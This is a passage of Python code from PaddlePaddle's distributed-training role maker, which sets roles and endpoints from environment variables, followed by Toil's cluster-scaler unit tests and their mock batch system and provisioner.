if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.environ["PADDLE_PORT"]
ip = os.environ["POD_IP"]
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_ip = os.environ["POD_IP"]
cur_port = os.environ["PADDLE_PORT"]
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
else:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER")
except ValueError as e:
raise ValueError(
"Something wrong with PaddleCloud, please check environment")
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = self._server_endpoints[0]
if self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import types
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import JobNode, Job
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow, travis_test
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
@travis_test
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
@travis_test
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
@travis_test
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
@travis_test
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise this, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
@travis_test
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
@travis_test
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
@travis_test
def testJobTooLargeForAllNodes(self):
"""
If a job is too large for all node types, the scaler should print a
warning, but definitely not crash.
"""
# Takes more RAM than an r3.8xlarge
largerThanR3 = Shape(wallTime=3600,
memory=h2b('360G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
self.bpf.addJobShape(largerThanR3)
# If we got here we didn't crash.
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
        try:
            # In Python 3 we can use a SimpleNamespace as a mock provisioner
            self.provisioner = types.SimpleNamespace()
        except AttributeError:
            # In Python 2 there is no SimpleNamespace; a bare object() would not
            # accept new attributes, so use an empty class instead
            class _Namespace(object):
                pass
            self.provisioner = _Namespace()
setattr(self.provisioner, 'nodeTypes', ['r3.8xlarge', 'c4.8xlarge'])
setattr(self.provisioner, 'nodeShapes', [r3_8xlarge,
c4_8xlarge_preemptable])
setattr(self.provisioner, 'setStaticNodes', lambda _, __: None)
setattr(self.provisioner, 'retryPredicate', lambda _: False)
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
@travis_test
def testRounding(self):
"""
Test to make sure the ClusterScaler's rounding rounds properly.
"""
# Get a ClusterScaler
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Exact integers round to themselves
self.assertEqual(scaler._round(0.0), 0)
self.assertEqual(scaler._round(1.0), 1)
self.assertEqual(scaler._round(-1.0), -1)
self.assertEqual(scaler._round(123456789101112.13), 123456789101112)
# Decimals other than X.5 round to the side they are closer to
self.assertEqual(scaler._round(1E-10), 0)
self.assertEqual(scaler._round(0.5 + 1E-15), 1)
self.assertEqual(scaler._round(-0.9), -1)
self.assertEqual(scaler._round(-0.4), 0)
# Decimals at exactly X.5 round away from 0
self.assertEqual(scaler._round(0.5), 1)
self.assertEqual(scaler._round(-0.5), -1)
self.assertEqual(scaler._round(2.5), 3)
self.assertEqual(scaler._round(-2.5), -3)
self.assertEqual(scaler._round(15.5), 16)
self.assertEqual(scaler._round(-15.5), -16)
self.assertEqual(scaler._round(123456789101112.5), 123456789101113)
@travis_test
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
@travis_test
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
@travis_test
def testNoLaunchingIfDeltaAlreadyMet(self):
"""
Check that the scaler doesn't try to launch "0" more instances if
the delta was able to be met by unignoring nodes.
"""
# We have only one node type for simplicity
self.provisioner.nodeTypes = ['c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Pretend there is one ignored worker in the cluster
self.provisioner.getProvisionedWorkers = MagicMock(
return_value=[Node('127.0.0.1', '127.0.0.1', 'testNode',
datetime.datetime.now().isoformat(),
nodeType='c4.8xlarge', preemptable=True)])
scaler.ignoredNodes.add('127.0.0.1')
# Exercise the updateClusterSize logic
self.provisioner.addNodes = MagicMock()
scaler.updateClusterSize({c4_8xlarge: 1})
self.assertFalse(self.provisioner.addNodes.called,
"addNodes was called when no new nodes were needed")
self.assertEqual(len(scaler.ignoredNodes), 0,
"The scaler didn't unignore an ignored node when "
"scaling up")
@travis_test
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
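# (For reference: smoothEstimate presumably applies an exponential moving
# average seeded at 0, i.e. new = betaInertia * previous +
# (1 - betaInertia) * estimate, which yields 0 -> 50 -> 75 -> ... -> 100.)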
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
# First do a simple test of creating 100 preemptable and non-preemptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if (preemptable and numPreemptableJobs > 0) or (not preemptable and numJobs > 0):
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.disk,
preemptable=False),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.debug("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
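# Note: nodeShapes aliases nodeTypes (same list object), so this sort orders
# both; in this mock a node's shape and its type are used interchangeably.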
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True, return only preemptable nodes; otherwise return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = Job(memory=jobShape.memory,
cores=jobShape.cores, disk=jobShape.disk,
preemptable=preemptable)
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
